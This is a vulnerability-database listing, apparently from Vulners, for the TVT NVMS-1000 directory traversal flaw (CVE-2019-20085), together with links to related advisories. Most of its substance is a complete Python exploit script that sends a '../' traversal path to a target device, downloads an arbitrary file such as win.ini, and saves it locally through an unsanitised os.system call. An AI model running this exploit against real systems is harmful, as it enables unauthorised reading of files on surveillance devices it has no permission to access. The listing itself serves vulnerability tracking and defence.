Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

TVT NVMS 1000 - Directory Traversal

🗓️ 13 Apr 2020 00:00:00Reported by Mohin ParamasivamType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 212 Views

VT NVMS 1000 Directory Traversal Exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today		TVT NVMS 1000 - Directory Traversal Exploit
13 Apr 202000:00
zdt
ATTACKERKB		CVE-2019-20085
30 Dec 201900:00
attackerkb
BDU FSTEC		The vulnerability of the microprogrammed software of TVT NVMS-1000 devices arises from incorrect restrictions on the path to the restricted access catalog. This allows attackers to disclose protected information.
20 Dec 202100:00
bdu_fstec
Circl		CVE-2019-20085
21 Jan 202014:52
circl
CISA KEV Catalog		TVT NVMS-1000 Directory Traversal Vulnerability
3 Nov 202100:00
cisa_kev
CNVD		TVT NVMS-1000 Directory Traversal Vulnerability
30 Dec 201900:00
cnvd
CVE		CVE-2019-20085
30 Dec 201902:28
cve
Cvelist		CVE-2019-20085
30 Dec 201902:28
cvelist
Metasploit		TVT NVMS-1000 Directory Traversal
1 Jan 202009:36
metasploit
Nuclei		TVT NVMS 1000 - Local File Inclusion
16 Jun 202607:13
nuclei
Rows per page
# Exploit Title: TVT NVMS 1000 - Directory Traversal 
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085

import sys
import requests
import os
import time

if len(sys.argv) !=4:
	print "  "
	print "Usage : python exploit.py url filename outputname"
	print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"	
	print "	"
else:


	traversal = "../../../../../../../../../../../../../"
	filename = sys.argv[2]
	url = sys.argv[1]+traversal+filename
	outputname = sys.argv[3]
	content = requests.get(url)

	if content.status_code == 200:
		
		print " "
		print "Directory Traversal Succeeded"
		time.sleep(3)
		print " "
		print "Saving Output"
		os.system("touch " + outputname)
		output_write = open(outputname,"r+")
		output_write.write(content.text)
		output_write.close()

	else:

		print "Host not vulnerable to Directory Traversal!"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Apr 2020 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 3.17.5
EPSS0.96071
SSVC
exploittvt nvms 1000directory traversalcve-2019-20085vendor homepagerequestsvulnerable host
212